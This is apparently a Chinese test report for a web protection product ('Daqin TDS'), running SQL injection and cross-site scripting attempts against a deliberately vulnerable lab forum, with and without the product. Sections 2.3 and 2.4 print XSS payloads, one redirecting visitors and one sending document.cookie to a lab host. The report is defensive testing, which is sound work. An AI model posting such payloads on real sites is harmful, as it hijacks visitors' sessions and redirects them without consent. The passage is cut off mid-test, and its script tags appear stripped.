TDS防SQL脚本注入攻击测试.doc

TDS防SQL注入或脚本攻击测试 一、大秦TDS防SQL注入测试结构 大秦TDS防SQL注入测试结构由TDS系统、1台Web服务器、1台管理控制终端、1台攻击终端和互联网环境组成。网络结构图如下： 其中Web服务器(2)存在2种web应用，一种是“大秦TDS系统防SQL注入模拟Web服务器”，访问网址是：2/dqbbs/；一种是“大秦TDS防SQL注入测试网站”，访问网址是：2:8080/edu/。大秦TDS系统防SQL注入模拟Web服务器是种bbs论坛，通过各种SQL注入，普通注册用户能够跳过用户名密码检测获取论坛用户数据，同时通过发帖挂上恶意脚本，获取访问者的cookies信息和将访问者访问页面定向指定的url等恶意行为。首页显示如下图： 大秦TDS防SQL注入测试网站是种模拟在线远程教育网站，访问者可以通过构造脚本作为url地址，获取目标服务器的操作系统类型、数据库类型等资源信息。首页显示如下图： 二、TDS防SQL脚本注入攻击测试用例 2.1 跳过用户名密码登陆验证的SQL注入 2.1.1没有TDS保护情况下的SQL注入 A,使用正确的用户名和密码正常登陆； 使用正确的用户名和密码可以正常登陆。 B，使用不正确的用户名或密码登陆； 错误的用户名或密码验证失败。 C，使用带SQL语句的用户名和任意密码登陆(包括空密码)； 空密码登陆： 使用带SQL语句的用户名和空密码可以登陆。 非空密码登陆： 在使用带SQL语句的用户名情况下可以使用任意密码登陆验证。 2.1.2有TDS保护情况下的SQL注入 使用带SQL语的用户名登陆； 输入带有SQL语句的用户名被TDS检测到，给予用户提示及对行为进行阻止，最终无法打开网页。 其中TDS防SQL注入模块配置如下图： TDS流量统计如下图： 2.2 获取用户数据信息的SQL注入 2.2.1没有TDS保护情况下的SQL注入 A, 输入存在的用户编号进行查询； 输入存在的用户编号进行查询，可以查询到对应用户编号的信息。 B,输入不存在的用户编号进行查询； 由于不存在该用户编号，所以没有相关用户信息显示。 C,输入带SQL语句的用户编号的数据进行查询； 输入带SQL语句的用户编号进行查询后，可以查询到所有用户编号的信息。 2.2.2有TDS保护情况下的SQL注入 A，输入带SQL语句的职业编号的数据进行查询； 输入带有SQL语句的用户编号被TDS检测到，给予用户提示及对行为进行阻止，最终无法打开网页。 其中TDS防SQL注入模块配置如下图： TDS流量统计如下图： 2.3 恶意重定向网站的脚本跨站攻击 2.3.1没有TDS保护情况下的脚本跨站攻击 A，打开Web服务器首页，注册一个论坛用户，进入某个论坛板块发表论坛文章； B,在文本输入框输入下列内容： “scriptlocation.href=;alert(你中了跨站攻击，现在转接到百度首页!→→^_^※^_^);/script”，点击提交，成功发表论坛帖子； C，打开首页，点击标题为“跨连接演示”的论坛帖子; D,弹出跨站攻击提示对话框，同时网页转到百度首页。 2.3.2有TDS保护情下的脚本跨站攻击 A，打开Web服务器首页，注册一个论坛用户，进入某个论坛板块发表论坛文章； B,在文本输入框输入下列内容： “scriptlocation.href=;alert(你中了跨站攻击，现在转接到百度首页!→→^_^※^_^);/script”，点击提交，弹出TDS防SQL注入安全警告，内容发表失败； 其中TDS防SQL注入模块配置如下图： TDS数据流量统计如下图： 2.4 获取访问者的cookies信息的SQL注入 2.4.1没有TDS保护情况下的SQL注入 A，打开Web服务器首页，注册一个论坛用户，进入某个论坛板块发表论坛文章； B,在文本输入框输入下列内容： “你的Cookit信息已经被获取，信息就显示新打开的窗口scriptwindow.open(2:8080/edu/XSS.asp?txtName=+document.cookie);alert(你中招啦!　^_^);/script”，点击提交，成功发表论坛帖子； C，打开首页，点击标题为“获取访问者的cookies信息演示”的论坛帖子; D，弹出一个标题为“访问者的cookies信息”的新窗口，同时弹出“你中招了，^_^”的对话框提示； 打开的帖子内容并不会显示脚本里的内容，只是显示纯文本内容，如下图： 2.4.2有TDS保护情况下的SQL注入 A，打开Web服务器首页，注册一个论坛用户，进入某个论坛板块发表论坛文章； B,